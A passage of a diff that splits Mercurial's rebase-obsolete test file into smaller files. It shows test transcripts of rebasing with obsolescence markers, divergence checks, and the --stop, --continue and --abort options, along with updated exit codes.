6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg rebase -r . -d 10 - note: not rebasing 11:f44da1f4954c tip "nonrelevant", it has no successor - -If a rebase is going to create divergence, it should abort - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "john" > doe - $ hg add doe - $ hg commit -m "john doe" - created new head - $ hg up 10 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "foo" > bar - $ hg add bar - $ hg commit --amend -m "10'" - $ hg up 10 --hidden - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 121d9e3bc4c6 - (hidden revision '121d9e3bc4c6' was rewritten as: 77d874d096a2) - $ echo "bar" > foo - $ hg add foo - $ hg commit -m "bar foo" - 1 new orphan changesets - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg summary - parent: 14:73568ab6879d tip (orphan) - bar foo - branch: default - commit: (clean) - update: 2 new changesets, 3 branch heads (merge) - phases: 8 draft - orphan: 1 changesets - $ hg rebase -s 10 -d 12 - abort: this rebase will cause divergences from: 121d9e3bc4c6 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - -With experimental.evolution.allowdivergence=True, rebase can create divergence - - $ hg rebase -s 10 -d 12 --config experimental.evolution.allowdivergence=True - rebasing 10:121d9e3bc4c6 "P" - rebasing 14:73568ab6879d tip "bar foo" - 2 new content-divergent changesets - $ hg summary - parent: 16:61bd55f69bc4 tip - bar foo - branch: default - commit: (clean) - update: 1 new changesets, 2 branch heads (merge) - phases: 8 draft - content-divergent: 2 changesets - -rebase --continue + skipped rev because their successors are in destination -we make a change in trunk and work on conflicting changes to make rebase abort. - - $ hg log -G -r 16:: - @ 16:61bd55f69bc4 bar foo - | - ~ - -Create the two changes in trunk - $ printf "a" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict first version" - - $ printf "dummy" > C - $ hg commit -m "dummy change successor" - -Create the changes that we will rebase - $ hg update -C 16 -q - $ printf "b" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict second version" - created new head - $ printf "dummy" > K - $ hg add K - $ hg commit -m "dummy change" - $ printf "dummy" > L - $ hg add L - $ hg commit -m "dummy change" - $ hg debugobsolete `hg log -r ".^" -T '{node}'` `hg log -r 18 -T '{node}'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - - $ hg log -G -r 16:: - @ 21:7bdc8a87673d dummy change - | - x 20:8b31da3c4919 dummy change (rewritten as 18:601db7a18f51) - | - o 19:b82fb57ea638 willconflict second version - | - | o 18:601db7a18f51 dummy change successor - | | - | o 17:357ddf1602d5 willconflict first version - |/ - o 16:61bd55f69bc4 bar foo - | - ~ - $ hg rebase -r ".^^ + .^ + ." -d 18 - rebasing 19:b82fb57ea638 "willconflict second version" - merging willconflict - warning: conflicts while merging willconflict! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ hg resolve --mark willconflict - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 19:b82fb57ea638 "willconflict second version" - note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor" - rebasing 21:7bdc8a87673d tip "dummy change" - $ cd .. - Divergence cases due to obsolete changesets ------------------------------------------- @@ -1098,9 +72,9 @@ $ hg rebase -b 'e' -d 'x' rebasing 1:488e1b7e7341 b "b" rebasing 3:a82ac2b38757 c "c" + note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence rebasing 5:027ad6c5830d d' "d'" rebasing 6:d60ebfa0f1cb e "e" - note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence $ hg log -G -r 'a':: o 11:eb6d63fc4ed5 e | @@ -1152,7 +126,7 @@ $ hg rebase -r 'c'::'f' -d 'x' abort: this rebase will cause divergences from: 76be324c128b (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] + [20] $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x' rebasing 3:a82ac2b38757 c "c" rebasing 4:76be324c128b d "d" @@ -1233,16 +207,16 @@ $ hg rebase -b 'f' -d 'x' rebasing 1:488e1b7e7341 b "b" rebasing 3:a82ac2b38757 c "c" - rebasing 5:63324dc512ea e' "e'" - rebasing 7:3ffec603ab53 f "f" rebasing 4:76be324c128b d "d" note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence + rebasing 5:63324dc512ea e' "e'" + rebasing 7:3ffec603ab53 f "f" $ hg log -G -r 'a': - o 13:a1707a5b7c2c d + o 13:ef6251596616 f | - | o 12:ef6251596616 f - | | - | o 11:b6f172e64af9 e' + o 12:b6f172e64af9 e' + | + | o 11:a1707a5b7c2c d |/ o 10:d008e6b4d3fd c | @@ -1250,13 +224,13 @@ | | * 8:2876ce66c6eb g | | - | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616) + | | x 7:3ffec603ab53 f (rewritten using rebase as 13:ef6251596616) | | | | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) | | | - | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9) + | | x 5:63324dc512ea e' (rewritten using rebase as 12:b6f172e64af9) | | | - | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c) + | x | 4:76be324c128b d (rewritten using rebase as 11:a1707a5b7c2c) | |/ | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd) | | @@ -1294,22 +268,63 @@ o 0:b173517d0057 a $ hg rebase -d 0 -r 2 - rebasing 2:a82ac2b38757 c "c" + note: not rebasing 2:a82ac2b38757 c "c", it has no successor $ hg log -G -r 'a': --hidden - o 5:69ad416a4a26 c + * 4:76be324c128b d | - | * 4:76be324c128b d + | x 3:ef8a456de8fa c1 (pruned) | | - | | x 3:ef8a456de8fa c1 (pruned) - | | | - | x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa rewritten using rebase as 5:69ad416a4a26) - | |/ - | o 1:488e1b7e7341 b + x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) |/ + o 1:488e1b7e7341 b + | o 0:b173517d0057 a $ cd .. +Start a normal rebase. When it runs into conflicts, rewrite one of the +commits in the rebase set, causing divergence when the rebase continues. + + $ hg init $TESTTMP/new-divergence-after-conflict + $ cd $TESTTMP/new-divergence-after-conflict + $ hg debugdrawdag <<'EOS' + > C2 + > | C1 + > |/ + > B # B/D=B + > | D + > |/ + > A + > EOS + $ hg rebase -r B::C1 -d D + rebasing 1:2ec65233581b B "B" + merging D + warning: conflicts while merging D! (edit, then use 'hg resolve --mark') + unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') + [240] + $ hg debugobsolete $(hg log -r C1 -T '{node}') $(hg log -r C2 -T '{node}') + 1 new obsolescence markers + obsoleted 1 changesets + $ hg log -G + o 4:fdb9df6b130c C2 + | + | x 3:7e5bfd3c08f0 C1 (rewritten as 4:fdb9df6b130c) + |/ + | @ 2:b18e25de2cf5 D + | | + % | 1:2ec65233581b B + |/ + o 0:426bada5c675 A + + $ echo resolved > D + $ hg resolve -m D + (no more unresolved files) + continue: hg rebase --continue + $ hg rebase -c + rebasing 1:2ec65233581b B "B" + note: not rebasing 3:7e5bfd3c08f0 C1 "C1" and its descendants as this would cause divergence + 1 new orphan changesets + Rebase merge where successor of one parent is equal to destination (issue5198) $ hg init p1-succ-is-dest @@ -1566,7 +581,7 @@ $ hg rebase -b 'desc("D")' -d 'desc("J")' abort: this rebase will cause divergences from: 112478962961 (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] + [20] Rebase merge where both parents have successors in destination @@ -1585,7 +600,7 @@ note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D" rebasing 7:dac5d11c5a7d E tip "E" abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f - [255] + [10] $ cd .. Rebase a non-clean merge. One parent has successor in destination, the other @@ -1652,489 +667,3 @@ Z $ cd .. - -Test that bookmark is moved and working dir is updated when all changesets have -equivalents in destination - $ hg init rbsrepo && cd rbsrepo - $ echo "[experimental]" > .hg/hgrc - $ echo "evolution=true" >> .hg/hgrc - $ echo "rebaseskipobsolete=on" >> .hg/hgrc - $ echo root > root && hg ci -Am root - adding root - $ echo a > a && hg ci -Am a - adding a - $ hg up 0 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo b > b && hg ci -Am b - adding b - created new head - $ hg rebase -r 2 -d 1 - rebasing 2:1e9a3c00cbe9 tip "b" - $ hg log -r . # working dir is at rev 3 (successor of 2) - 3:be1832deae9a b (no-eol) - $ hg book -r 2 mybook --hidden # rev 2 has a bookmark on it now - bookmarking hidden changeset 1e9a3c00cbe9 - (hidden revision '1e9a3c00cbe9' was rewritten as: be1832deae9a) - $ hg up 2 && hg log -r . # working dir is at rev 2 again - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - 2:1e9a3c00cbe9 b (rewritten using rebase as 3:be1832deae9a) (no-eol) - $ hg rebase -r 2 -d 3 --config experimental.evolution.track-operation=1 - note: not rebasing 2:1e9a3c00cbe9 mybook "b", already in destination as 3:be1832deae9a tip "b" -Check that working directory and bookmark was updated to rev 3 although rev 2 -was skipped - $ hg log -r . - 3:be1832deae9a b (no-eol) - $ hg bookmarks - mybook 3:be1832deae9a - $ hg debugobsolete --rev tip - 1e9a3c00cbe90d236ac05ef61efcc5e40b7412bc be1832deae9ac531caa7438b8dcf6055a122cd8e 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Obsoleted working parent and bookmark could be moved if an ancestor of working -parent gets moved: - - $ hg init $TESTTMP/ancestor-wd-move - $ cd $TESTTMP/ancestor-wd-move - $ hg debugdrawdag <<'EOS' - > E D1 # rebase: D1 -> D2 - > | | - > | C - > D2 | - > | B - > |/ - > A - > EOS - $ hg update D1 -q - $ hg bookmark book -i - $ hg rebase -r B+D1 -d E - rebasing 1:112478962961 B "B" - note: not rebasing 5:15ecf15e0114 book D1 tip "D1", already in destination as 2:0807738e0be9 D2 "D2" - 1 new orphan changesets - $ hg log -G -T '{desc} {bookmarks}' - @ B book - | - | x D1 - | | - o | E - | | - | * C - | | - o | D2 - | | - | x B - |/ - o A - -Rebasing a merge with one of its parent having a hidden successor - - $ hg init $TESTTMP/merge-p1-hidden-successor - $ cd $TESTTMP/merge-p1-hidden-successor - - $ hg debugdrawdag <<'EOS' - > E - > | - > B3 B2 # amend: B1 -> B2 -> B3 - > |/ # B2 is hidden - > | D - > | |\ - > | B1 C - > |/ - > A - > EOS - 1 new orphan changesets - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg rebase -r $D -d $E - rebasing 5:9e62094e4d94 "D" - - $ hg log -G - o 7:a699d059adcf D - |\ - | o 6:ecc93090a95c E - | | - | o 4:0dc878468a23 B3 - | | - o | 1:96cc3511f894 C - / - o 0:426bada5c675 A - -For some reasons (--hidden, rebaseskipobsolete=0, directaccess, etc.), -rebasestate may contain hidden hashes. "rebase --abort" should work regardless. - - $ hg init $TESTTMP/hidden-state1 - $ cd $TESTTMP/hidden-state1 - $ cat >> .hg/hgrc <<EOF - > [experimental] - > rebaseskipobsolete=0 - > EOF - - $ hg debugdrawdag <<'EOS' - > C - > | - > D B # prune: B, C - > |/ # B/D=B - > A - > EOS - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg update -q $C --hidden - updated to hidden changeset 7829726be4dc - (hidden revision '7829726be4dc' is pruned) - $ hg rebase -s $B -d $D - rebasing 1:2ec65233581b "B" - merging D - warning: conflicts while merging D! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ cp -R . $TESTTMP/hidden-state2 - - $ hg log -G - @ 2:b18e25de2cf5 D - | - | % 1:2ec65233581b B (pruned using prune) - |/ - o 0:426bada5c675 A - - $ hg summary - parent: 2:b18e25de2cf5 tip - D - branch: default - commit: 1 modified, 1 added, 1 unknown, 1 unresolved - update: 1 new changesets, 2 branch heads (merge) - phases: 3 draft - rebase: 0 rebased, 2 remaining (rebase --continue) - - $ hg rebase --abort - rebase aborted - -Also test --continue for the above case - - $ cd $TESTTMP/hidden-state2 - $ hg resolve -m - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 1:2ec65233581b "B" - rebasing 3:7829726be4dc tip "C" - $ hg log -G - @ 5:1964d5d5b547 C - | - o 4:68deb90c12a2 B - | - o 2:b18e25de2cf5 D - | - o 0:426bada5c675 A - -==================== -Test --stop option | -==================== - $ cd .. - $ hg init rbstop - $ cd rbstop - $ echo a>a - $ hg ci -Aqma - $ echo b>b - $ hg ci -Aqmb - $ echo c>c - $ hg ci -Aqmc - $ echo d>d - $ hg ci -Aqmd - $ hg up 0 -q - $ echo f>f - $ hg ci -Aqmf - $ echo D>d - $ hg ci -Aqm "conflict with d" - $ hg up 3 -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | x 2:177f92b77385 test - | | c - | | - | x 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test it aborts if unstable csets is not allowed: -=============================================== - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=False - > EOF - - $ hg strip 6 --no-backup -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot remove original changesets with unrebased descendants - (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets) - [255] - $ hg rebase --abort - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - rebase aborted - -Test --stop when --keep is passed: -================================== - $ hg rebase -s 1 -d 5 --keep - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop aborts when --collapse was passed: -============================================= - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=True - > EOF - - $ hg strip 6 - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 --collapse -m "collapsed b c d" - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot stop in --collapse session - [255] - $ hg rebase --abort - rebase aborted - $ hg diff - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop raise errors with conflicting options: -================================================= - $ hg rebase -s 3 -d 5 - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop --dry-run - abort: cannot specify both --stop and --dry-run - [10] - - $ hg rebase -s 3 -d 5 - abort: rebase in progress - (use 'hg rebase --continue', 'hg rebase --abort', or 'hg rebase --stop') - [20] - $ hg rebase --stop --continue - abort: cannot specify both --stop and --continue - [10] - -Test --stop moves bookmarks of original revisions to new rebased nodes: -====================================================================== - $ cd .. - $ hg init repo - $ cd repo - - $ echo a > a - $ hg ci -Am A - adding a - - $ echo b > b - $ hg ci -Am B - adding b - $ hg book X - $ hg book Y - - $ echo c > c - $ hg ci -Am C - adding c - $ hg book Z - - $ echo d > d - $ hg ci -Am D - adding d - - $ hg up 0 -q - $ echo e > e - $ hg ci -Am E - adding e - created new head - - $ echo doubt > d - $ hg ci -Am "conflict with d" - adding d - - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | o 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | o 2: 49cb3485fa0c 'C' bookmarks: Y - | | - | o 1: 6c81ed0049f8 'B' bookmarks: X - |/ - o 0: 1994f17a630e 'A' bookmarks: - - $ hg rebase -s 1 -d 5 - rebasing 1:6c81ed0049f8 X "B" - rebasing 2:49cb3485fa0c Y "C" - rebasing 3:67a385d4e6f2 Z "D" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - o 7: 9c86c650b686 'C' bookmarks: Y - | - o 6: 9b87b54e5fd8 'B' bookmarks: X - | - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | * 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | x 2: 49cb3485fa0c 'C' bookmarks: - | | - | x 1: 6c81ed0049f8 'B' bookmarks: - |/ - o 0: 1994f17a630e 'A' bookmarks: - diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete4.t copy from tests/test-rebase-obsolete.t copy to tests/test-rebase-obsolete4.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete4.t @@ -18,1647 +18,11 @@ > strip= > EOF -Setup rebase canonical repo - - $ hg init base - $ cd base - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up tip - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ cd .. - -simple rebase ---------------------------------- - - $ hg clone base simple - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd simple - $ hg up 32af7686d403 - 3 files updated, 0 files merged, 2 files removed, 0 files unresolved - $ hg rebase -d eea13746799a - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 10:8eeb3c33ad33) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 9:2327fea05063) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:e4e5be0395b2) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 e4e5be0395b2cbd471ed22a26b1b6a1a0658a794 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 2327fea05063f39961b14cb69435a9898dc9a245 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 8eeb3c33ad33d452c89e5dcf611c347f978fb42b 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - - - $ cd .. - -empty changeset ---------------------------------- - - $ hg clone base empty - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd empty - $ hg up eea13746799a - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - -We make a copy of both the first changeset in the rebased and some other in the -set. - - $ hg graft 42ccdea3bb16 32af7686d403 - grafting 1:42ccdea3bb16 "B" - grafting 3:32af7686d403 "D" - $ hg rebase -s 42ccdea3bb16 -d . - rebasing 1:42ccdea3bb16 "B" - note: not rebasing 1:42ccdea3bb16 "B", its destination already has all its changes - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - note: not rebasing 3:32af7686d403 "D", its destination already has all its changes - $ hg log -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (pruned using rebase) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 10:5ae4c968c6ac) - | | - | x 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - - -More complex case where part of the rebase set were already rebased - - $ hg rebase --rev 'desc(D)' --dest 'desc(H)' - rebasing 9:08483444fef9 "D" - 1 new orphan changesets - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log -G - @ 11:4596109a6a43 D - | - | * 10:5ae4c968c6ac C - | | - | x 9:08483444fef9 D (rewritten using rebase as 11:4596109a6a43) - | | - | o 8:8877864f1edb B - | | - o | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg rebase --source 'desc(B)' --dest 'tip' --config experimental.rebaseskipobsolete=True - rebasing 8:8877864f1edb "B" - note: not rebasing 9:08483444fef9 "D", already in destination as 11:4596109a6a43 tip "D" - rebasing 10:5ae4c968c6ac "C" - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 8877864f1edb05d0e07dc4ba77b67a80a7b86672 462a34d07e599b87ea08676a449373fe4e2e1347 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5ae4c968c6aca831df823664e706c9d4aa34473d 98f6af4ee9539e14da4465128f894c274900b6e5 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log --rev 'contentdivergent()' - $ hg log -G - o 13:98f6af4ee953 C - | - o 12:462a34d07e59 B - | - @ 11:4596109a6a43 D - | - o 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --style default --debug -r 4596109a6a4328c398bde3a4a3b6737cfade3003 - changeset: 11:4596109a6a4328c398bde3a4a3b6737cfade3003 - phase: draft - parent: 7:02de42196ebee42ef284b6780a87cdc96e8eaab6 - parent: -1:0000000000000000000000000000000000000000 - manifest: 11:a91006e3a02f1edf631f7018e6e5684cf27dd905 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: rebase_source=08483444fef91d6224f6655ee586a65d263ad34c - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - - $ hg up -qr 'desc(G)' - $ hg graft 4596109a6a4328c398bde3a4a3b6737cfade3003 - grafting 